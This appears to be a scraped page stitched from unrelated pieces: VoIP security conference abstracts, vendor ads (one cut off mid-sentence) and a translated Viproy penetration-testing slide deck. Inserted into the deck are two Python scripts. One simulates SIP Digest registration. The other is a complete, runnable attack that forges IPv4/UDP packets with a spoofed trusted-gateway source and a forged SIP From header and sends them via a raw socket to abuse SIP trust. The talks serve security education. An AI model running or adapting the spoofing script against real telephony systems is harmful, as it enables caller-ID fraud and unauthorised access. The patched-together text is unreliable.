Özgür Yazılım ve Linux Günleri (Free Software and Linux Days), held every year by the Linux Kullanıcıları Derneği (Linux Users Association), took place at Bilgi University's santralistanbul campus; we contributed with a presentation titled "FreePBX ile Özgür Santral Yazılımı" (Free PBX Software with FreePBX).
With the growth of voice and video communication over IP driven by next-generation technologies such as 4G LTE and 5G, data weaknesses and security gaps have become the main concerns, especially given the nature of IP infrastructure. New IP-based communication technologies are driving a comprehensive transformation, from consumers' communication habits to enterprise infrastructures and the business models of communication providers. Alongside advantages such as lower cost, ease of operation and deployment, and location independence, these IP-based systems bring serious security risks with them. Secure IP communication must therefore concentrate on application-level attacks. With our NOVA solution you can detect weaknesses, take measures against attacks and provide secure media communication.
The Art of VoIP Hacking - Defcon 23 Workshop, by Fatih Ozavci
VoIP attacks have evolved, and they now target Unified Communications (UC), commercial services, hosted environments and call centres using major vendor and protocol vulnerabilities. This workshop is designed to demonstrate these cutting-edge VoIP attacks and to improve the VoIP skills of incident response teams, penetration testers and network engineers. Signalling protocols are the centre of UC environments, but they are also susceptible to IP spoofing, trust issues, call spoofing, authentication bypass and invalid signalling flows. They can be attacked with legacy techniques, but a set of new attacks will be demonstrated in this workshop. The workshop covers basic attack types for UC infrastructure, advanced attacks on SIP and Skinny protocol weaknesses, network infrastructure attacks, value-added services analysis, CDR/log/billing analysis and the use of Viproy to analyse signalling services with novel techniques. Well-known attacks on the network infrastructure will also be combined with current VoIP vulnerabilities to test the workshop's target network. Attacking VoIP services requires limited knowledge today with the Viproy Penetration Testing Kit (written by Fatih). It has a dozen modules for testing trust issues, collecting information from SIP and Skinny services, gaining unauthorised access, call redirection, call spoofing, brute-forcing VoIP accounts, Cisco CUCDM exploitation and debugging services by acting as a MITM. Viproy provides these attack modules fully integrated into the Metasploit Framework. The workshop contains live demonstrations of practical VoIP attacks and of the Viproy modules.
In this hands-on workshop, attendees will learn about basic attack types for UC infrastructure, advanced attacks on SIP protocol weaknesses, Cisco Skinny protocol hacking, hacking Cisco CUCDM and CUCM servers, network infrastructure attacks, value-added services analysis, CDR/log/billing analysis and the Viproy VoIP pen-test kit for analysing VoIP services with novel techniques. New CDP, CUCDM and Cisco Skinny modules and techniques in Viproy will be demonstrated in the workshop as well.
Black Hat USA 2016 - Presentation Video
https://www.youtube.com/watch?v=rl_kp5UZKlw
Larger organisations are using VoIP within their commercial services and corporate communications, and the take-up of cloud-based Unified Communications (UC) solutions is rising every day. However, response teams and security testers have limited knowledge of VoIP attack surfaces and of the threats in the wild. Because of this lack of understanding of modern UC security requirements, numerous service providers, larger organisations and subscribers are leaving themselves open to attack. Current threat actors are repurposing this exposed infrastructure for botnets, toll fraud and the like.
The talk aims to arm response and security testing teams with knowledge of cutting-edge attacks, tools and vulnerabilities for VoIP networks. Some of the headlines are: attacking cloud-based VoIP solutions to jailbreak tenant environments; discovering critical security vulnerabilities in the VoIP products of major vendors; exploiting harder-to-fix VoIP protocol and service vulnerabilities; testing the security of IP Multimedia Subsystem (IMS) services; and understanding the toolset developed by the author to discover previously unknown vulnerabilities and to develop custom attacks. In addition, the business impact of these attacks will be explained for various implementations, such as cloud UC services, commercial services, service provider networks and corporate communications. Through the demonstrations, the audience will understand how they can secure and test their communication infrastructure and services. The talk will also be accompanied by newer versions of Viproy and Viproxy, developed by the author to run the attack demonstrations.
Hardware Hacking Chronicles: IoT Hacking for Offence and Defence, by Fatih Ozavci
Enterprise companies use consumer and IoT devices to complete (or expand) their services, such as broadband, IPTV, media streaming, satellite, voice and 3G/4G services. Although the devices are owned by the service providers, subscribers have limited (or full) access to them under their service agreements. In addition, some consumer devices also play roles in corporate communications, environment security or employee services. Consumer devices are located at subscriber premises; therefore, the traditional security testing approach only covers the security of backend services, not the devices.
Consumer and IoT devices are susceptible to hardware hacking attacks such as firmware dumping, re-flashing with a custom firmware, and gaining low-level access through physical management interfaces such as SPI, JTAG and UART. The low-level access obtained can be used to modify device behaviour or initial state. This helps attackers debug consumer devices and operator services, find new vulnerabilities, and obtain the device configuration, which may contain credentials for the service infrastructure.
Embedded device and hardware hacking is a rising skill set for penetration testers. It is needed to understand targeted attacks, which may include hardware implants, modified hardware attacking its own infrastructure, or compromised devices that target the human factor. Some of the advanced testing examples to be discussed are preparing custom hardware for persistent access during a red teaming exercise, preparing a compromised consumer device for human-factor pen-testing, attacking a provider's TR-069 services using smart home modems, and altering the security controls of a device to abuse the service.
The presentation focuses on how existing security testing techniques should evolve with hardware and IoT hacking, and how service providers can secure their infrastructure against cutting-edge attacks. Essential hardware hacking information, identifying and using physical management interfaces, the hardware hacking toolset, well-known hardware attacks and a hardware testing procedure will be presented as a road map for consumer device security testing. A security testing approach will also be explained for developing new security testing services and improving existing ones such as red teaming, human-factor pen-testing and infrastructure pen-testing.
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version), by Fatih Ozavci
Enterprise companies are increasingly using Microsoft Lync 2010/2013 (a.k.a. Skype for Business 2015) as their call centre, internal communication, cloud communication and video conferencing platform. These services are based on VoIP and instant messaging protocols, and support multiple client types such as Microsoft Office 365, Microsoft Lync, Skype for Business, IP phones and teleconferencing devices. Official clients are also available for mobile devices (e.g. Windows Phone, Android and iOS), desktops (Mac, Linux and Windows) and web applications developed with the .NET framework. Although the Microsoft Lync platform has been developed alongside the new technologies, it still suffers from old VoIP, teleconferencing and platform issues.
Modern VoIP attacks can be used against Microsoft Lync environments to obtain unauthorised access to the infrastructure. Exposed MS Lync front-end and edge servers, insecure federation design, lack of encryption, insufficient defences against VoIP attacks and insecure compatibility options may allow attackers to hijack enterprise communications. Enterprise users and employees are also the next-generation targets for these attackers, who can attack client softphones and handsets using broken communication, invalid protocol options and malicious messaging content to compromise sensitive business assets. These attacks may lead to privacy violations, legal issues, call/toll fraud and intelligence collection.
Attack vectors and practical threats against the Microsoft Lync ecosystem will be presented with newly published vulnerabilities and Microsoft Lync testing modules of the Viproy VoIP kit developed by the speaker. This will be accompanied by live demonstrations against a test environment.
• A brief introduction to Microsoft Lync ecosystem
• Security requirements, design vulnerabilities and priorities
• Modern threats against commercial Microsoft Lync services
• Demonstration of new attack vectors against target test platform
This presentation, given at Abbasağa Park, describes how to prevent the privacy violations that arose during the Gezi Park protests and what needs to be done to protect privacy.
Hacking and Attacking VoIP Systems - What You Need To Know, by Dan York
Presentation by Dan York at AstriCon 2007 about how to secure VoIP systems with a focus on the Asterisk open source PBX. The presentation outlines the issues involved with VoIP security, the tools out there to attack/test VoIP systems, best practices to defend against attacks and ends with some specific security recommendations for Asterisk. Audio will soon be available at http://www.blueboxpodcast.com/ (and will be synced to this presentation).
VoIP Wars: Destroying Jar Jar Lync (Filtered version), by Fatih Ozavci
This is my Athcon 2013 slide set. In the live demo I also demonstrated attacking mobile applications via SIP trust, scanning via SIP proxies and MITM fuzzing.
Reboot the Open Realtime Revolution - #MoreCrypto (Fall 2014), by Olle E Johansson
My talk at Voip2day 2014 in Madrid, Spain, and at Elastix World 2014 in Santiago, Chile. Asterisk is now 15 years old; the revolution has faded away and is now part of regular business. It's time to restart and look forward, build new things and include security by default. Security needs to be in focus for everyone in VoIP and real-time communication during the coming year.
Slide deck for the topics covered in part 1 of session 7 of the Siber Güvenlik Buluşmaları (Cyber Security Meetups), held by Siber Güvenlik Derneği on 07.12.2013.
Attacks on VoIP networks around the world continue to increase.
With the generational shift in access technologies and the spread of IPv6, VoIP usage is growing, and in parallel a great deal of fraud and many vulnerabilities are being encountered.
You are safe with the Netaş Nova Security Family products.
Do you provide internet service to users who change every day? Does Law No. 5651 require you to keep usage records or IP assignments for the users on your system?
We offer an easy-to-manage, customisable logging system that meets all the requirements of the law.
Secure WLAN Technology
Law No. 5651, enacted to prevent and trace illegal internet use in places where shared internet access is offered, such as hotels, hospitals, business centres, guest houses, restaurants, schools and campuses, obliges every business that offers shared internet access to keep an internet usage history that can produce reports on every user who accesses the internet through its systems.
Under this law, all users' internet access and the pages they visit must be tracked and recorded by a combination of hardware and software.
At Cenetric, the solution built by our forward-looking team delivers the logging system that regulates and controls your users' web access from a single device that also enables efficient video, voice and data sharing.
Key Features
The central control system and hotspot solution we offer is tailored to the enterprise sector, in particular to businesses such as hotels, restaurants, campuses and airport terminals that provide internet access to customers, guests and employees.
Roaming
IAPP (Inter-Access Point Protocol) lets your connected users roam between access points.
Smart Network Management
With our EAP-enabled CAPWAP (Control and Provisioning of Wireless Access Points) service, the access point devices connected on the default networks are detected and each one's IP address is changed automatically to the one defined for it in the network. All settings can be made through the web interface or over the SNMP protocol.
Groups and Quality of Service
With the classes you create, you can offer classified or categorised access services. Eight group options let you define groups and access categories in the most effective way.
In addition, the system can classify and scale traffic under 4 main categories (video, voice, background and performance). Each group is defined by the access area attached to it; with well-defined rules, each access area provides access within the rules set for its group. For example, a group named VoIP can manage pre-designated WiFi phones within the area covered by its own access point devices.
Firewall and Rules
The security levels defined in the firewall are ordered hierarchically, from "lowest
This is the introductory presentation for the two-day workshop held as part of our consulting service on identifying cyber-security risks originating from suppliers.
1. VoIP Auditing with Viproy
Fatih Özavcı
Security Consultant
viproy.com
2. Speaker
• Fatih Özavcı, Security Consultant
• Interests
  • VoIP & phreaking
  • Mobile technologies
  • Network infrastructures
  • Embedded systems
  • Hardware and IoT hacking
• Developer of the Viproy VoIP penetration testing kit
• International speaker and trainer
  • Blackhat, Defcon, Troopers, AusCert, Ruxcon
viproy.com 2
3. Threats and Attacker Capabilities
Assumptions:
• Physical access to VoIP networks is hard
• VoIP attacks require advanced skills
• Attacks focus on privacy and call spoofing
• VoIP services are configured very securely
Reality:
• Inadequate physical security, weak access control
• Since Viproy, VoIP experience is no longer required to attack
• Client attacks, intelligence gathering, persistent access
• Weak passwords, legacy systems, patching problems
4. Viproy VoIP Penetration Testing Kit
• Viproy means "call/decision" in Vulcan
• Viproy VoIP penetration testing kit
  • A package of test modules for the Metasploit Framework
  • SIP & Skinny libraries for rapid test development
  • Custom SIP headers and authentication support
  • Trust relationship analysis, SIP proxy analysis, MITM modules
• Modules
  • Simple and complex SIP tests (message, call)
  • SIP authentication, user and domain enumeration
  • SIP trust relationship analysis, SIP proxy use, rogue service
  • Cisco Skinny analysis and Cisco CUCM/CUCDM exploits
  • Polycom configuration extractor
5. Security Auditing and Free Software
• An audit must be specific to the organisation/system/software, so every test needs to be customised
• Defining custom tests requires being able to loop over the available test patterns
• The outputs gathered at the various audit steps must be combined and evaluated together
• Simple, fast, fit-for-purpose tools increase the efficiency of the audit process
• Open-source tools, where what is being done is clearly visible, should be preferred
9. Sample Audit Route
Scope definition
• Identify the servers
• Identify the clients
• Understand the network
• Information gathering
Network infrastructure analysis
• Infrastructure discovery
• SSL/TLS analysis
• Packet capture
• Call decoding
• Denial of service
VoIP server analysis
• Credential testing
• Authorisation analysis
• Custom calls
• Software issues
• Management issues
• Custom tests
VoIP client analysis
• Direct calls
• Software issues
• Management issues
• Custom tests
10. Defining the Audit Scope
• The information given in the audit brief is not always sufficient
  • Servers (SIP, SIP proxy, RTP proxy)
  • Clients (software, dedicated hardware)
  • Layout of the network infrastructure
• Information required before the audit
  • Type and version of the hardware and software
  • Chosen protocols and options
  • Management or support services
  • Use of TLS and SRTP
11. Understanding the VoIP Service
• Client types
  • Software (IP Communicator, Android/iOS apps)
  • IP phones (Cisco 7945, Yealink)
  • Video conferencing devices (Cisco Presence)
  • External conferencing solutions (Webex, GoMeeting)
• Service purpose
  • International/national/mobile network interconnects
  • Call centre (commercial products and free alternatives)
  • Commercial VoIP services (mobile and cloud solutions)
  • Enterprise use (VLANs, meeting rooms)
• VoIP protocols (SIP, Skinny, RTP, IAX, Diameter)
12. Physical Access Analysis
• Local distribution networks and rooms
• Network and customer-service termination devices
13. Physical Access to the VoIP Network
• Meeting rooms, lobby, guest phones, emergency phones
• PC ports, PoE
• Raspberry Pi
• Persistent access over 3G/4G
18. Signalling
VoIP = Signalling + Media
• Signalling services are responsible for operations such as call setup, tracking, transfer and registration.
• Media transport takes place over a separate channel/service from signalling (e.g. RTP, which carries the media under both SIP and H.323).
• Important signalling protocols
  • SIP services (vendor extensions and customisations)
  • Vendor-specific signalling services (SCCP / Skinny)
20. Basic SIP Flow
1. Phone A -> SIP Server: REGISTER; SIP Server -> Phone A: 200 OK
2. Phone A -> SIP Server: INVITE
3. SIP Server -> Phone B: INVITE; Phone B -> SIP Server: 183 Session Progress, then 200 OK
4. SIP Server -> Phone A: 200 OK; Phone A -> SIP Server -> Phone B: ACK
Media: Phone A <-> RTP Proxy <-> Phone B over RTP, on a path separate from the signalling
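The registration step of the flow above, as an added example that is not part of the Viproy deck: a minimal SIP REGISTER with Digest authentication (RFC 3261 section 22, MD5 without qop), with the phone and the registrar both simulated in-process so the exchange runs offline. The realm pbx.example.test, the account table, and the Via/Contact addresses are assumptions made for the example. It also shows what the "registration without authentication" and "dictionary attack" items later in the deck test for: a registrar that answers 200 OK to the first REGISTER is not authenticating at all, and the retry loop is the same one a dictionary attack drives with candidate passwords.

```python
import hashlib
import re
import secrets

# Assumed realm, server URI and account table (constructed for this example)
REALM = "pbx.example.test"
SERVER_URI = "sip:pbx.example.test"
ACCOUNTS = {"1001": "S3cr3t-1001", "1002": "weak"}


def build_request(method, uri, headers, body=""):
    """Serialise a SIP request from a list of (name, value) headers."""
    lines = [f"{method} {uri} SIP/2.0"] + [f"{k}: {v}" for k, v in headers]
    lines.append(f"Content-Length: {len(body.encode())}")
    return "\r\n".join(lines) + "\r\n\r\n" + body


def parse_message(raw):
    """Split a SIP request or response into (start line, {lower-name: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *hdrs = head.split("\r\n")
    headers = {}
    for h in hdrs:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers, body


def digest_response(username, password, method, uri, nonce):
    """RFC 2617 Digest without qop: MD5(HA1:nonce:HA2), HA1 = MD5(user:realm:pass)."""
    ha1 = hashlib.md5(f"{username}:{REALM}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()


def parse_auth_params(value):
    """'Digest a="b", c="d"' -> {'a': 'b', 'c': 'd'}"""
    return dict(re.findall(r'(\w+)="([^"]*)"', value))


class SipRegistrar:
    """Registrar side: challenge the first REGISTER, verify the Digest on the retry."""

    def __init__(self):
        self.nonces = set()      # nonces we issued and have not yet consumed
        self.registered = {}     # user -> Contact

    def handle(self, raw):
        start, headers, _ = parse_message(raw)
        method, uri, _ = start.split(" ", 2)
        if method != "REGISTER":
            return "SIP/2.0 405 Method Not Allowed\r\n\r\n"
        auth = headers.get("authorization")
        if not auth:
            nonce = secrets.token_hex(8)
            self.nonces.add(nonce)
            return ("SIP/2.0 401 Unauthorized\r\n"
                    f'WWW-Authenticate: Digest realm="{REALM}", nonce="{nonce}"\r\n\r\n')
        p = parse_auth_params(auth)
        nonce = p.get("nonce")
        if nonce not in self.nonces:         # unknown or replayed nonce
            return "SIP/2.0 403 Forbidden\r\n\r\n"
        self.nonces.discard(nonce)           # single use
        user = p.get("username")
        if user not in ACCOUNTS:
            return "SIP/2.0 403 Forbidden\r\n\r\n"
        expected = digest_response(user, ACCOUNTS[user], method, p.get("uri", ""), nonce)
        if not secrets.compare_digest(expected, p.get("response", "")):
            return "SIP/2.0 403 Forbidden\r\n\r\n"   # many registrars re-challenge with 401 instead
        self.registered[user] = headers.get("contact", "")
        return "SIP/2.0 200 OK\r\n\r\n"


def register(registrar, username, password, host="192.0.2.10"):
    """Phone side: REGISTER, answer the 401 challenge, return the final status line."""
    def headers(cseq, extra=()):
        return [("Via", f"SIP/2.0/UDP {host}:5060;branch=z9hG4bK-{cseq}"),
                ("From", f"<sip:{username}@{REALM}>;tag=abc"),
                ("To", f"<sip:{username}@{REALM}>"),
                ("Call-ID", f"reg-{username}@{host}"),
                ("CSeq", f"{cseq} REGISTER"),
                ("Contact", f"<sip:{username}@{host}:5060>")] + list(extra)

    first = registrar.handle(build_request("REGISTER", SERVER_URI, headers(1)))
    status, hdrs, _ = parse_message(first)
    if not status.startswith("SIP/2.0 401"):
        return status                        # 200 here means the registrar never authenticated
    nonce = parse_auth_params(hdrs["www-authenticate"])["nonce"]
    resp = digest_response(username, password, "REGISTER", SERVER_URI, nonce)
    auth = (f'Digest username="{username}", realm="{REALM}", nonce="{nonce}", '
            f'uri="{SERVER_URI}", response="{resp}"')
    retry = build_request("REGISTER", SERVER_URI, headers(2, [("Authorization", auth)]))
    return parse_message(registrar.handle(retry))[0]


if __name__ == "__main__":
    reg = SipRegistrar()
    print(register(reg, "1001", "S3cr3t-1001"))   # SIP/2.0 200 OK
    print(register(reg, "1001", "guess"))         # SIP/2.0 403 Forbidden
```

The nonce is consumed on first use so a captured Authorization header cannot simply be replayed; a real deployment also needs nonce expiry and should run the retry over TLS, since the Digest only protects the password, not the rest of the request.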
22. Basic Attacks
• Finding SIP services and their roles
• Discovering the usable methods and features
• Analysing the SIP software and its vulnerabilities
• Identifying target extensions, users and domains
• SIP registration without authentication (trunk, VAS)
• Dictionary attacks against the identified user accounts
• Call analysis without authentication or registration
• IP-based direct call analysis
• Call and identity spoofing
26. Caller ID Spoofing Against All Operators
• All operators trust the caller ID
• One affected operator is enough to deceive everyone
27. Advanced SIP Attacks
In networks with unified communications and a large number of session management gateways, advanced attacks can also be carried out.
• SIP proxy bypass attack
• SIP trust relationship analysis
• Denial-of-service analysis
28. SIP Proxy Bypass Attack
Lab topology: 192.168.1.146 (Melbourne), 192.168.1.202 (Brisbane), 192.168.1.145 (Sydney, production SIP service)
29. Distributed Denial of Service Attack
SIP-based DoS attacks
• UDP vulnerabilities and IP spoofing
• Too many errors, very very verbose mode
• ICMP errors
Lab topology: 192.168.1.146 (Melbourne), 192.168.1.202 (Brisbane), 192.168.1.145 (Sydney, production SIP service); the host Alderaan sends IP-spoofed UDP SIP requests
30. SIP Trust Relationship Analysis
Diagram: 192.168.1.146 (Melbourne), 192.168.1.202 (Brisbane) and 192.168.1.145 (Sydney, production SIP service) joined by a "UDP Trust" relationship; a host Tatooine labelled "Universal Trust"
Send INVITE/MESSAGE requests with
• IP spoofing (the source is Brisbane),
• a From field containing the spoofed IP and port,
and the caller ID will be your trusted host.
31. SIP Trust Relationship Analysis
It's a TRAP!
Send INVITE/MESSAGE requests with
• IP spoofing (the source is Brisbane),
• a From field containing a special number,
and you will have fun, or voicemail access.
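The spoofed request described on the two slides above, as an added example that is not Viproy's code: it builds the on-the-wire packet by hand, an IPv4 header with the trusted gateway's address as source, a UDP datagram with a valid checksum, and a SIP MESSAGE whose Via and From also claim the trusted host (slide 30) or a chosen number at that host (slide 31). The lab addresses are the ones on the slides; the target user, the message text and the use of port 5060 on both sides are assumptions. Sending needs a raw socket (root or CAP_NET_RAW on Linux) and an engagement that authorises it; verify_packet lets you confirm the checksums without sending anything.

```python
import socket
import struct

# Lab addresses from the deck; ports, user and text are assumptions for the example
TRUSTED_GW = "192.168.1.202"   # Brisbane: the host the Sydney service trusts over UDP
TARGET = "192.168.1.145"       # Sydney: production SIP service
SIP_PORT = 5060


def checksum(data):
    """Ones-complement checksum used by both IPv4 and UDP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def sip_message(src_host, dst_host, to_user, text, from_user=None, src_port=SIP_PORT):
    """SIP MESSAGE whose Via and From both claim the spoofed source.
    from_user=None  -> From is the bare trusted host:port (slide 30)
    from_user="..." -> From is that number at the trusted host (slide 31)"""
    from_uri = f"sip:{from_user}@{src_host}" if from_user else f"sip:{src_host}:{src_port}"
    body = text.encode()
    head = (f"MESSAGE sip:{to_user}@{dst_host} SIP/2.0\r\n"
            f"Via: SIP/2.0/UDP {src_host}:{src_port};branch=z9hG4bK-trust1\r\n"
            f"From: <{from_uri}>;tag=t1\r\n"
            f"To: <sip:{to_user}@{dst_host}>\r\n"
            f"Call-ID: trust-1@{src_host}\r\n"
            "CSeq: 1 MESSAGE\r\n"
            f"Contact: <sip:{src_host}:{src_port}>\r\n"
            "Content-Type: text/plain\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode() + body


def udp_datagram(src_ip, dst_ip, src_port, dst_port, payload):
    """UDP header; the checksum covers the IPv4 pseudo-header, so it depends on the spoofed source."""
    length = 8 + len(payload)
    pseudo = socket.inet_aton(src_ip) + socket.inet_aton(dst_ip) + struct.pack("!BBH", 0, 17, length)
    hdr = struct.pack("!HHHH", src_port, dst_port, length, 0)
    csum = checksum(pseudo + hdr + payload) or 0xFFFF   # 0 would mean "no checksum"
    return struct.pack("!HHHH", src_port, dst_port, length, csum) + payload


def ipv4_packet(src_ip, dst_ip, payload, ttl=64):
    """IPv4 header without options; the source address is whatever we claim."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0, ttl, 17, 0,
                      socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]
    return hdr + payload


def spoofed_trust_probe(trusted_gw=TRUSTED_GW, target=TARGET, to_user="1001",
                        text="trust test", from_user=None):
    """Complete wire packet: IP source, Via and From all say trusted_gw."""
    sip = sip_message(trusted_gw, target, to_user, text, from_user)
    return ipv4_packet(trusted_gw, target,
                       udp_datagram(trusted_gw, target, SIP_PORT, SIP_PORT, sip))


def verify_packet(pkt):
    """Both checksums of a well-formed packet sum to zero when the checksum field is included."""
    ihl = (pkt[0] & 0x0F) * 4
    udp = pkt[ihl:]
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, 17, len(udp))
    return checksum(pkt[:ihl]) == 0 and checksum(pseudo + udp) == 0


if __name__ == "__main__":
    pkt = spoofed_trust_probe()
    assert verify_packet(pkt)
    # IPPROTO_RAW sends our IPv4 header as-is (needs root or CAP_NET_RAW on Linux)
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.sendto(pkt, (TARGET, 0))
```

Because UDP carries no handshake, nothing in this packet proves it came from 192.168.1.202; if the service's trust is keyed on that source address alone, the MESSAGE is accepted with the gateway's identity. The same probe over TCP or TLS fails at the handshake, which is why trust between SIP gateways should be bound to a TLS peer identity or a shared secret rather than to an IP address.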
35. Cisco Skinny Analysis
• Viproy provides a strong Skinny testing environment with a Skinny library and 3 test modules
  • Unauthorised registration
  • Unauthorised call initiation
  • Unauthorised call forwarding
37. Resources for Viproy
• Viproy VoIP Penetration and Exploitation Kit
Author: http://viproy.com/fozavci
Homepage: http://viproy.com
Github: http://www.github.com/fozavci/viproy-voipkit
• Attacking SIP Servers Using Viproy VoIP Kit (50 mins)
https://www.youtube.com/watch?v=AbXh_L0-Y5A
• Hacking Trust Relationships Between SIP Gateways
http://viproy.com/files/siptrust.pdf
• VulnVoIP: a sample VoIP system with deliberate vulnerabilities
http://www.rebootuser.com/?cat=371